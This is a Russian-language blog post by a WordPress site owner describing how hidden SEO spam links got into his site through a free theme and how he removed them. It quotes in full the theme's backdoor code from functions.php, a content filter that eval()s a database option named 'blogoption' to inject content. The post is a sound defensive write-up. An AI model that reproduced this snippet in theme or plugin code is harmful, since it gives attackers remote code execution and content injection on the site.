Главная > Блого и сайтоводство > Откуда берутся скрытые ссылки на вордпресс?

Откуда берутся скрытые ссылки на вордпресс?

Rooks_Back_Of_SavrasovЗдравствуйте, девочки и мальчики, увлекающиеся созданием сайтов на вордпресс. Сегодня хочу поведать вам одну очередную страшилку о том, как нехорошие дяди (а может, и тети, кто их разберет?) пытались бесплатно размещать свои нехорошие ссылки на одном моем хорошем сайте (не на этом), который имеет какие-никакие пузомерки (ссылок я с него не продаю), но я их победил. Наверное, в одной из заметок блога я уже заикался о том, что размещение ссылок на тот или иной ресурс помогают продвижению того блога или сайта, на который они ведут. Поэтому многие вебмастера правдами и неправдами пытаются заполучить как можно больше обратных ссылок на свой ресурс, и делают это не всегда честными методами. Иногда они делают это топорно, а иногда оригинально, хотя суть не меняется.

Не буду вокруг, да около, а просто напишу, что буквально день-два назад я решил проверить один из своих сайтов на количество размещенных ссылок на нем. Сделать это можно несколькими способами, например, воспользоваться сервисом Linkpad, что я и сделал. После секундной проверки моему изумленному взору предстала картина Саврасова – грачи прилетели.

grachi-prileteli

Грачами оказались несколько ссылок, которые я НЕ размещал. А анкорами (анкор – это текст, который представляет собой кликабельную ссылку) оказались ни много, ни мало – «обыкновенные» точки. Ну, подумаешь, скажете вы, всего-то 5-10 ссылок на пятисотстраничном сайте, погоды не сделают. Так-то оно так, но где гарантия, что в один не прекрасный день их не станет больше? Да и метод размещения подобных ссылок не нравится поисковым системам, вплоть до головокружения и тошноты у них, из-за чего сайт или блог может попасть под АГС. Дело в том, что эти хитропопые ссылки были замаскированы в тексте методом, который очень не любят ПС, в коде это выглядит так (на картинке, кликабельно).

skrytye-ssylki

Стиль отображения ссылки такой, что ссылка не отображается, как ссылка, а отображается, как обычный текст. Если бы не специальные сервисы или специальные программы, такие ссылки вручную на многостраничном сайте практически не найти, разве что случайно. Недостаток вышеуказанного сервиса в большой инерционности, то есть обновляет свою информацию он сравнительно редко, и если вы хотите оперативно проверить свой сайт на внешние ссылки, используйте программу Xenu или другие.

Просканировав сайт программой Xenu, я определили страницы, на которых находились скрытые ссылки и опытным путем определил, что виноват бесплатный шаблон сайта, установленный пару недель назад. Хотя и удалил при установке несколько ссылок из него, видимо, зараза еще оставалась. Почитав немного в Сети про маскировку ссылок подобным образом, я узнал, что обычно так происходит при изменениях в фале functions.php, который есть в каждом шаблоне wordpress, а скрытые ссылки выводит следующий код:

add_filter(‘the_content’, ‘_bloginfo’, 10001);
function _bloginfo($content){
global $post;
if(is_single() && ($co=@eval(get_option(‘blogoption’))) !== false){
return $co;
} else return $content;
}

Данный код присутствует в зараженной теме, а при ее активации в базе данных в таблице wp_options создается обработчик запросов по имени-адресу «blogoption», который бяки в статьи и вставляет. Проще говоря, контент на движке вордпресс выводится по запросу из базы данных, но при зараженном движке (как в моем случае), по запросу возвращается (возвращался) контент не с моей базы данных, а с чужой, с левого ресурса. Но контент не абы какой, а мой собственный (копия), но вместе с добавленными ссылками. И, как я понимаю, так для каждой заметки на сайте. Менять или не менять отображение той или иной статьи – решалось нехорошими дядями, которые успели таким образом несколько статей «подменить».

Опасность ситуации в том, что таким образом они могут отобразить на любой странице любое произвольное содержание или начать размещать на сайте контент с вирусами. За подобное поведение поисковые системы легко могут отправить сайт под фильтры. Надо полагать, что подобное (явное злодеяние) поведение нехарактерно для этих дяденек, склонных к пассивной мужской любви, потому что скрытно размещать нужные им ссылки на чужих трастовых ресурсах (за деньги) – намного выгоднее, чем они и пользуются. Им выгоднее размещать левые ссылки втихушку, небольшим порциями, чтобы зараженные сайты не улетели сразу под фильтры поисковых систем. Конечно, подобный метод размещения скрытых ссылок на сайте – не единственный, но, по крайне мере, вам стал известен один из механизмов.

После того, как я удалил вышеописанный код и запись в базе данных, скрытые ссылки с сайта исчезли, и, слава богу, этих ссылок было пока не так много. Ну а новый шаблон я пока оставил, потому что шаблон сам по себе не причем, виноват я сам в том, что с легкостью установил бесплатную тему. Как обезопасить себя от подобного? – спросите вы, – ну, разве что установить плагины для защиты блога, регулярно обновлять движок, а темы закачивать с официального депозитария. Главное – это ваша внимательность и регулярная проверка блога на скрытые ссылки, которые вы не размещали.

Берегите свои ресурсы, берегите себя.

Автор — vituson

Блого и сайтоводство

  1. Пока что нет комментариев.